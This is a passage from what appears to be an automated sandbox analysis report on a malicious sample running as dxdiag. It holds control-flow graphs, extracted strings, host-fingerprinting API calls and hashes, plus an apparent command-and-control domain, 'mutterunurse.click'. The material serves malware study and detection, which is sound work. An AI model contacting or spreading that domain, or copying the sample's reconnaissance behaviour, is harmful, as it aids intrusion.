4237c0-4237c6 call 408000 335->344 345 4239f1-4239f7 call 408000 335->345 346 4239eb 335->346 347 4237cf 335->347 337->337 343 4239c0-4239e3 call 421270 337->343 338->331 338->338 340->335 340->340 341->287 341->288 341->292 341->293 341->294 341->320 341->344 343->346 344->347 346->345 347->292
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #R,T$$^<P$VW$]~"p$ij$KM
                                                                                          • API String ID: 0-788320361
                                                                                          • Opcode ID: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                                          • Instruction ID: 9ed236048ece28067beed024fb633757567cd4a7e3bca11c75bb2a7735f0e68b
                                                                                          • Opcode Fuzzy Hash: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                                          • Instruction Fuzzy Hash: D1F1CAB46083509FD310DF65E88262BBBF1EFD5304F44892DE4958B351EB789A06CB4B

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 354 40a960-40a989 355 40a990-40a9e5 354->355 355->355 356 40a9e7-40aadf 355->356 357 40aae0-40ab1b 356->357 357->357 358 40ab1d-40ab39 357->358 359 40ab40-40ab69 358->359 359->359 360 40ab6b-40ab7a call 40b6a0 359->360 362 40ab7f-40ab86 360->362 363 40ae29-40ae32 362->363 364 40ab8c-40ab98 362->364 365 40aba0-40abb2 364->365 365->365 366 40abb4-40abb9 365->366 367 40abc0-40abcc 366->367 368 40abd3-40abe4 367->368 369 40abce-40abd1 367->369 370 40ae20-40ae26 call 439b60 368->370 371 40abea-40abff 368->371 369->367 369->368 370->363 373 40ac00-40ac41 371->373 373->373 374 40ac43-40ac50 373->374 376 40ac52-40ac58 374->376 377 40ac84-40ac88 374->377 378 40ac67-40ac6b 376->378 379 40ae1e 377->379 380 40ac8e-40acb6 377->380 378->379 381 40ac71-40ac78 378->381 379->370 382 40acc0-40acf4 380->382 383 40ac7a-40ac7c 381->383 384 40ac7e 381->384 382->382 385 40acf6-40acff 382->385 383->384 386 40ac60-40ac65 384->386 387 40ac80-40ac82 384->387 388 40ad01-40ad0b 385->388 389 40ad34-40ad36 385->389 386->377 386->378 387->386 391 40ad17-40ad1b 388->391 389->379 390 40ad3c-40ad52 389->390 392 40ad60-40adb2 390->392 391->379 393 40ad21-40ad28 391->393 392->392 396 40adb4-40adbe 392->396 394 40ad2a-40ad2c 393->394 395 40ad2e 393->395 394->395 397 40ad10-40ad15 395->397 398 40ad30-40ad32 395->398 399 40adc0-40adc8 396->399 400 40adf4-40adf8 396->400 397->389 397->391 398->397 401 40add7-40addb 399->401 402 40adfe-40ae1c call 40a6d0 400->402 401->379 404 40addd-40ade4 401->404 402->370 406 40ade6-40ade8 404->406 407 40adea-40adec 404->407 406->407 408 40add0-40add5 407->408 409 40adee-40adf2 407->409 408->401 410 40adfa-40adfc 408->410 409->408 410->379 410->402
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
                                                                                          • API String ID: 0-490458541
                                                                                          • Opcode ID: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                                          • Instruction ID: 966b8f91f76bb20883ed88500b6b89ab0c93423946d56f050922860fedc986fe
                                                                                          • Opcode Fuzzy Hash: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                                          • Instruction Fuzzy Hash: D7C1267260C3504BC714CF6488905AFBBD3ABC2304F1E893DE9D56B382D679991AC78B

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 411 40ce55-40ce62 412 40ce70-40ce9b 411->412 412->412 413 40ce9d-40ced5 call 408720 call 436f90 412->413 418 40cee0-40cf06 413->418 418->418 419 40cf08-40cf6b 418->419 420 40cf70-40cfa7 419->420 420->420 421 40cfa9-40cfba 420->421 422 40cfc0-40cfcb 421->422 423 40d03d 421->423 424 40cfd0-40cfd9 422->424 425 40d041-40d049 423->425 424->424 426 40cfdb 424->426 427 40d05b-40d068 425->427 428 40d04b-40d04f 425->428 426->425 429 40d06a-40d071 427->429 430 40d08b-40d093 427->430 431 40d050-40d059 428->431 432 40d080-40d089 429->432 433 40d095-40d096 430->433 434 40d0ab-40d1c6 430->434 431->427 431->431 432->430 432->432 435 40d0a0-40d0a9 433->435 436 40d1d0-40d215 434->436 435->434 435->435 436->436 437 40d217-40d239 436->437 438 40d240-40d250 437->438 438->438 439 40d252-40d27f call 40b6a0 438->439 441 40d284-40d29e 439->441
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AD25FE18D17A68A323D904AF30EFEBBC$F^$I@$N~ :$VgfW$mutterunurse.click$z@(
                                                                                          • API String ID: 0-3269320285
                                                                                          • Opcode ID: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                                          • Instruction ID: b1d760c26d9b90ec4573806c6615211f8657e28aa76e89aec63d6860f5017e85
                                                                                          • Opcode Fuzzy Hash: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                                          • Instruction Fuzzy Hash: A191EEB05083C18BD335CF25D8A0BEBBBE0AB96314F148D6DD4DD9B282D738454ACB96

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 442 4087f0-4087fe call 43afd0 445 408804-40880b call 434680 442->445 446 408979-40897b ExitProcess 442->446 449 408811-408849 GetCurrentProcessId GetCurrentThreadId 445->449 450 408974 call 43b400 445->450 452 408851-4088d6 GetForegroundWindow 449->452 453 40884b-40884f 449->453 450->446 454 408950-408968 call 409cc0 452->454 455 4088d8-40894e 452->455 453->452 454->450 458 40896a call 40cdf0 454->458 455->454 460 40896f call 40b670 458->460 460->450
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                          • String ID: YO9W
                                                                                          • API String ID: 3118123366-386669604
                                                                                          • Opcode ID: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                                          • Instruction ID: 5b12a659e8285d1355c3597aa5681aa9478bfa7506ef17589c1493984f4e9e7d
                                                                                          • Opcode Fuzzy Hash: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                                          • Instruction Fuzzy Hash: 98315977F5061807C31C7AB98C4636AB5874BC4614F0F863E9DD9AB386FDB89C0442D9

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 462 42bfda-42c03f call 43ce00 466 42c040-42c06c 462->466 466->466 467 42c06e-42c078 466->467 468 42c07a-42c083 467->468 469 42c09d 467->469 470 42c090-42c099 468->470 471 42c09f-42c0ac 469->471 470->470 472 42c09b 470->472 473 42c0cb-42c13a FreeLibrary call 43ce00 GetComputerNameExA 471->473 474 42c0ae-42c0b5 471->474 472->471 479 42c140-42c167 473->479 475 42c0c0-42c0c9 474->475 475->473 475->475 479->479 480 42c169-42c173 479->480 481 42c175-42c17f 480->481 482 42c18d 480->482 484 42c180-42c189 481->484 483 42c18f-42c19c 482->483 486 42c1bb-42c20f GetComputerNameExA 483->486 487 42c19e-42c1a5 483->487 484->484 485 42c18b 484->485 485->483 489 42c210-42c252 486->489 488 42c1b0-42c1b9 487->488 488->486 488->488 489->489 490 42c254-42c25e 489->490 491 42c260-42c267 490->491 492 42c27b-42c288 490->492 493 42c270-42c279 491->493 494 42c28a-42c291 492->494 495 42c2ab-42c2ff 492->495 493->492 493->493 496 42c2a0-42c2a9 494->496 498 42c300-42c324 495->498 496->495 496->496 498->498 499 42c326-42c330 498->499 500 42c332-42c339 499->500 501 42c34b-42c358 499->501 502 42c340-42c349 500->502 503 42c35a-42c361 501->503 504 42c37b-42c3d6 call 43ce00 501->504 502->501 502->502 505 42c370-42c379 503->505 509 42c3e0-42c3fa 504->509 505->504 505->505 509->509 510 42c3fc-42c406 509->510 511 42c41b-42c42f 510->511 512 42c408-42c40f 510->512 513 42c572-42c5b1 511->513 514 42c435-42c43c 511->514 515 42c410-42c419 512->515 517 42c5c0-42c5e7 513->517 516 42c440-42c44a 514->516 515->511 515->515 518 42c460-42c466 516->518 519 42c44c-42c451 516->519 517->517 520 42c5e9-42c5fb 517->520 522 42c490-42c49e 518->522 523 42c468-42c46b 518->523 521 42c510-42c516 519->521 524 42c61b-42c61e call 430520 520->524 525 42c5fd-42c604 520->525 531 42c518-42c51e 521->531 528 42c4a4-42c4a7 522->528 529 42c52a-42c533 522->529 523->522 526 42c46d-42c483 523->526 533 42c623-42c643 524->533 527 42c610-42c619 525->527 526->521 527->524 527->527 528->529 532 42c4ad-42c50e 528->532 535 42c535-42c537 529->535 536 42c539-42c53c 529->536 531->513 534 42c520-42c522 531->534 532->521 534->516 539 42c528 534->539 535->531 537 42c56e-42c570 536->537 538 42c53e-42c56c 536->538 537->521 538->521 539->513
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0042C0D7
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName$FreeLibrary
                                                                                          • String ID: x
                                                                                          • API String ID: 2243422189-2363233923
                                                                                          • Opcode ID: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                                          • Instruction ID: f24e0535182122329204161442b6cb3576d9d8656e0dc52521a12abdc108ad65
                                                                                          • Opcode Fuzzy Hash: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                                          • Instruction Fuzzy Hash: EFD1B46060C3E08ED7358B2994903BFBBD1AFD7344F5849ADD0C99B282D779450ACB57

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 540 436c40-436c74 call 414a30 543 436c76-436c79 540->543 544 436cd5-436cf0 543->544 545 436c7b-436cd3 543->545 546 436cf2-436cf5 544->546 545->543 547 436d21-436d24 546->547 548 436cf7-436d1f 546->548 549 436d26-436d31 547->549 548->546 550 436d33 549->550 551 436d35-436d4a 549->551 552 436da2-436da5 550->552 553 436d4e-436d59 551->553 554 436d4c 551->554 557 436da7 552->557 558 436da9-436db3 552->558 555 436d96-436d99 553->555 556 436d5b-436d91 call 43b480 553->556 554->555 560 436d9b 555->560 561 436d9d-436da0 555->561 556->555 557->558 562 436db5 558->562 563 436dba-436dd8 558->563 560->552 561->549 564 436f75-436f82 562->564 565 436dda-436ddd 563->565 567 436e09-436e0c 565->567 568 436ddf-436e07 565->568 569 436e0e-436e19 567->569 568->565 570 436e20-436e38 569->570 571 436e1b 569->571 573 436e3a 570->573 574 436e3c-436e47 570->574 572 436ea2-436ea5 571->572 575 436ea7 572->575 576 436ea9-436eae 572->576 577 436e92-436e96 573->577 574->577 578 436e49-436e85 call 43b480 574->578 575->576 579 436eb0-436ebc 576->579 580 436ebe-436edc 576->580 582 436e9a-436e9d 577->582 583 436e98 577->583 585 436e8a-436e8d 578->585 579->580 584 436ede-436ee1 580->584 582->569 583->572 586 436ee3-436f0b 584->586 587 436f0d-436f10 584->587 585->577 586->584 588 436f12-436f18 587->588 589 436f1a 588->589 590 436f1c-436f2e 588->590 591 436f73 589->591 592 436f32-436f38 590->592 593 436f30 590->593 591->564 594 436f67-436f6a 592->594 595 436f3a-436f64 call 43b480 592->595 593->594 596 436f71 594->596 597 436f6c-436f6f 594->597 595->594 596->591 597->588
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `$a$b$c$cba`cba`
                                                                                          • API String ID: 0-3925122358
                                                                                          • Opcode ID: 5e1df088af1431bf05ca1571bfd6cdbdd7f3fabc29e584d71a065595dab268f0
                                                                                          • Instruction ID: 716de675438fc7be0f84b9257b2f5ff0fcac0ae5b07daa8bb6709f6b9bb0c7b9
                                                                                          • Opcode Fuzzy Hash: 5e1df088af1431bf05ca1571bfd6cdbdd7f3fabc29e584d71a065595dab268f0
                                                                                          • Instruction Fuzzy Hash: 5FA14975E083459FDB04CFA8C4513AEBFF2AB9A310F1AC06ED44697392C67D8905C79A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 600 40c36e-40c559 601 40c560-40c58e 600->601 601->601 602 40c590-40c7ab 601->602 604 40c7b0-40c7de 602->604 604->604 605 40c7e0-40c7e8 604->605 606 40c7ec-40c7ff 605->606
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ){+}$4cde$CJ$F'k)$GS
                                                                                          • API String ID: 0-4192230409
                                                                                          • Opcode ID: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                                          • Instruction ID: 6afdb2316fdadaf12e32bd698f1912d34734f08b0bc4a82971b76fff6b28e520
                                                                                          • Opcode Fuzzy Hash: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                                          • Instruction Fuzzy Hash: 50B11BB84053058FE354DF629688FAA7BB0FB25310F1A82E9E0992F776D7748405CF96

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 607 42c6d7-42c6ff 608 42c700-42c74f 607->608 608->608 609 42c751-42c761 608->609 610 42c763-42c76f 609->610 611 42c77b-42c787 609->611 612 42c770-42c779 610->612 613 42c7a1-42c803 call 43ce00 call 41dc20 611->613 614 42c789-42c78b 611->614 612->611 612->612 622 42c810-42c82a 613->622 615 42c790-42c79d 614->615 615->615 617 42c79f 615->617 617->613 622->622 623 42c82c-42c85f 622->623 624 42c860-42c886 623->624 624->624 625 42c888-42c892 624->625 626 42c894-42c89b 625->626 627 42c8ab-42c8b3 625->627 628 42c8a0-42c8a9 626->628 629 42c8b5-42c8b6 627->629 630 42c8cb-42c8d8 627->630 628->627 628->628 631 42c8c0-42c8c9 629->631 632 42c8da-42c8e1 630->632 633 42c8fb-42c946 630->633 631->630 631->631 635 42c8f0-42c8f9 632->635 634 42c950-42c978 633->634 634->634 636 42c97a-42c984 634->636 635->633 635->635 637 42c986-42c98f 636->637 638 42c99b-42c9a5 636->638 639 42c990-42c999 637->639 640 42c9a7-42c9ab 638->640 641 42c9bb-42ca35 638->641 639->638 639->639 642 42c9b0-42c9b9 640->642 643 42cad8-42cb04 641->643 642->641 642->642 644 42cb10-42cb60 643->644 644->644 645 42cb62-42cb72 644->645 646 42cb74-42cb76 645->646 647 42cb8b-42cb97 645->647 650 42cb80-42cb89 646->650 648 42cbb1-42cbf7 call 43ce00 GetPhysicallyInstalledSystemMemory call 41dc20 647->648 649 42cb99-42cb9b 647->649 656 42cbfc-42cc13 648->656 651 42cba0-42cbad 649->651 650->647 650->650 651->651 653 42cbaf 651->653 653->648 657 42cc20-42cc3a 656->657 657->657 658 42cc3c-42cc6f 657->658 659 42cc70-42cc96 658->659 659->659 660 42cc98-42cca2 659->660 661 42cca4-42ccab 660->661 662 42ccbb-42ccc3 660->662 663 42ccb0-42ccb9 661->663 664 42ccc5-42ccc6 662->664 665 42ccdb-42cce8 662->665 663->662 663->663 666 42ccd0-42ccd9 664->666 667 42ccea-42ccf1 665->667 668 42cd0b-42cd56 665->668 666->665 666->666 669 42cd00-42cd09 667->669 670 42cd60-42cd88 668->670 669->668 669->669 670->670 671 42cd8a-42cd98 670->671 672 42cd9a-42cda1 671->672 673 42cdbb-42cdc5 671->673 674 42cdb0-42cdb9 672->674 675 42ca40-42cad5 673->675 676 42cdcb 673->676 674->673 674->674 675->643 677 42cdd0-42cdd9 676->677 677->677 678 42cddb 677->678 678->675
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: '$iJ
                                                                                          • API String ID: 0-30662343
                                                                                          • Opcode ID: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                                          • Instruction ID: e8033de2897f6a471e39d6e72682695b514e130b01bc458e21cc2d5cc8d806b0
                                                                                          • Opcode Fuzzy Hash: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                                          • Instruction Fuzzy Hash: 7C02F57060C3E18FD7298F2990A03ABBFE1AF97304F58496ED4D997342D77984058B97

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 679 42bfd3-42c0e8 call 43ce00 682 42c0ed-42c13a GetComputerNameExA 679->682 683 42c140-42c167 682->683 683->683 684 42c169-42c173 683->684 685 42c175-42c17f 684->685 686 42c18d 684->686 688 42c180-42c189 685->688 687 42c18f-42c19c 686->687 690 42c1bb-42c20f GetComputerNameExA 687->690 691 42c19e-42c1a5 687->691 688->688 689 42c18b 688->689 689->687 693 42c210-42c252 690->693 692 42c1b0-42c1b9 691->692 692->690 692->692 693->693 694 42c254-42c25e 693->694 695 42c260-42c267 694->695 696 42c27b-42c288 694->696 697 42c270-42c279 695->697 698 42c28a-42c291 696->698 699 42c2ab-42c2ff 696->699 697->696 697->697 700 42c2a0-42c2a9 698->700 702 42c300-42c324 699->702 700->699 700->700 702->702 703 42c326-42c330 702->703 704 42c332-42c339 703->704 705 42c34b-42c358 703->705 706 42c340-42c349 704->706 707 42c35a-42c361 705->707 708 42c37b-42c3d6 call 43ce00 705->708 706->705 706->706 709 42c370-42c379 707->709 713 42c3e0-42c3fa 708->713 709->708 709->709 713->713 714 42c3fc-42c406 713->714 715 42c41b-42c42f 714->715 716 42c408-42c40f 714->716 717 42c572-42c5b1 715->717 718 42c435-42c43c 715->718 719 42c410-42c419 716->719 721 42c5c0-42c5e7 717->721 720 42c440-42c44a 718->720 719->715 719->719 722 42c460-42c466 720->722 723 42c44c-42c451 720->723 721->721 724 42c5e9-42c5fb 721->724 726 42c490-42c49e 722->726 727 42c468-42c46b 722->727 725 42c510-42c516 723->725 728 42c61b-42c61e call 430520 724->728 729 42c5fd-42c604 724->729 735 42c518-42c51e 725->735 732 42c4a4-42c4a7 726->732 733 42c52a-42c533 726->733 727->726 730 42c46d-42c483 727->730 737 42c623-42c643 728->737 731 42c610-42c619 729->731 730->725 731->728 731->731 732->733 736 42c4ad-42c50e 732->736 739 42c535-42c537 733->739 740 42c539-42c53c 733->740 735->717 738 42c520-42c522 735->738 736->725 738->720 743 42c528 738->743 739->735 741 42c56e-42c570 740->741 742 42c53e-42c56c 740->742 741->725 742->725 743->717
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID: x
                                                                                          • API String ID: 3545744682-2363233923
                                                                                          • Opcode ID: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                                          • Instruction ID: cbfe56490d4610b99627c39bd120223bdbde8b4c29662e55905f397c0fd00549
                                                                                          • Opcode Fuzzy Hash: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                                          • Instruction Fuzzy Hash: 1AD1176060C7E18ED7358B2894903BFBBD1AF97344F5849AED0D54B382D739940AC797

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 744 4097b0-4097be 745 4097c4-40982f call 405e60 call 407ff0 744->745 746 409c65 744->746 752 409830-409873 745->752 748 409c67-409c73 746->748 752->752 753 409875-409895 call 409070 752->753 756 4098a0-4098b4 753->756 756->756 757 4098b6-4098df call 409070 756->757 760 4098e0-40992b 757->760 760->760 761 40992d-409966 call 409070 760->761 764 409970-4099ca 761->764 764->764 765 4099cc-4099d6 764->765 766 4099e0-409a12 765->766 766->766 767 409a14-409a3b call 409070 766->767 770 409a40-409a59 767->770 770->770 771 409a5b-409b29 call 409360 770->771 774 409b30-409b82 771->774 774->774 775 409b84-409b8c 774->775 776 409bb2-409bbe 775->776 777 409b8e-409b96 775->777 778 409bc0-409bc3 776->778 779 409be2-409c0f 776->779 780 409ba0-409bb0 777->780 781 409bd0-409be0 778->781 782 409c10-409c24 779->782 780->776 780->780 781->779 781->781 782->782 783 409c26-409c3b call 40c350 782->783 785 409c40-409c63 call 408000 783->785 785->748
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AD25FE18D17A68A323D904AF30EFEBBC$EIFT$_P$w
                                                                                          • API String ID: 0-1502974083
                                                                                          • Opcode ID: 75d97640b3faaac57dd24be4c61a62bd06a513c5caf22db02b2c8c010e917981
                                                                                          • Instruction ID: d6c9ba6df74010c44a12fa1b015f50b5a98841c64097f62a202da139de979759
                                                                                          • Opcode Fuzzy Hash: 75d97640b3faaac57dd24be4c61a62bd06a513c5caf22db02b2c8c010e917981
                                                                                          • Instruction Fuzzy Hash: 9DC125716083409BD718DF35C8526AFBBE6EBD1314F188A2DE4D297392DA3CC909CB56

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 788 426170-42618f 789 426190-4261bf 788->789 789->789 790 4261c1-4261cd 789->790 791 426214-426221 790->791 792 4261cf-4261d7 790->792 793 426230-426283 791->793 794 4261e0-4261e7 792->794 793->793 795 426285-426289 793->795 796 4261f0-4261f6 794->796 797 4261e9-4261ec 794->797 798 426310-426312 795->798 799 42628f-4262af call 439b40 795->799 796->791 801 4261f8-42620c call 43b480 796->801 797->794 800 4261ee 797->800 803 4264ef-4264f8 798->803 807 4262b0-4262df 799->807 800->791 805 426211 801->805 805->791 807->807 808 4262e1-4262ed 807->808 809 426336-42633a 808->809 810 4262ef-4262f7 808->810 811 426340-426349 809->811 812 4264e6-4264ec call 439b60 809->812 813 426300-426307 810->813 814 426350-426365 811->814 812->803 816 426317-42631d 813->816 817 426309-42630c 813->817 814->814 818 426367-426369 814->818 816->809 821 42631f-42632e call 43b480 816->821 817->813 820 42630e 817->820 823 426370-42637d call 407ff0 818->823 824 42636b 818->824 820->809 825 426333 821->825 828 426390-42639a 823->828 824->823 825->809 829 426380-42638e 828->829 830 42639c-42639f 828->830 829->828 831 4263b3-4263b7 829->831 832 4263a0-4263af 830->832 833 4264dd-4264e3 call 408000 831->833 834 4263bd-4263c8 831->834 832->832 835 4263b1 832->835 833->812 836 4263ca-4263d1 834->836 837 42641b-426467 call 407ff0 call 408e90 834->837 835->829 839 4263ec-4263f0 836->839 851 426470-4264b8 837->851 842 4263f2-4263fb 839->842 843 4263e0 839->843 846 426410-426414 842->846 847 4263fd-426400 842->847 845 4263e1-4263ea 843->845 845->837 845->839 846->845 849 426416-426419 846->849 847->845 849->845 851->851 852 4264ba-4264d9 call 408ff0 call 408000 851->852 852->833
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: 4zVc$8zVc$YNMZ$cba`
                                                                                          • API String ID: 2994545307-1799417857
                                                                                          • Opcode ID: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                          • Instruction ID: a4538a0261ff6c2ac210d57fc6ac5424e6a326b8b8d8802f404cc31a7d59ec03
                                                                                          • Opcode Fuzzy Hash: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                                          • Instruction Fuzzy Hash: 189147B2F042208BD724DA25EC8172B7292EBD1314F5A857EEC8597342E678AC00C7DA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                          • Instruction ID: 4d3fd89be0cb7aed4be93335616a378edd6ad360b4f2b7dd84c825cf95623c92
                                                                                          • Opcode Fuzzy Hash: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                                          • Instruction Fuzzy Hash: 9BA159B16047418FCB24CF34C891663BBE2FF56314B098A6ED49A8B792E738F845CB55
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: @CDE
                                                                                          • API String ID: 2994545307-1513065382
                                                                                          • Opcode ID: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                                                                          • Instruction ID: 3c5ac0be7424b57116813a4f2293c38aabf5a2246835f37d4781b8179357b19c
                                                                                          • Opcode Fuzzy Hash: cbdfbb28d977ac1ea6b7f73f0ada9322f454d3da5a8c62154e5dc83033fd8ee1
                                                                                          • Instruction Fuzzy Hash: EFB146717493414BC318DB2AC8D1A3BBBE6ABE9314F1CD93DE58687392C638DC058796
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
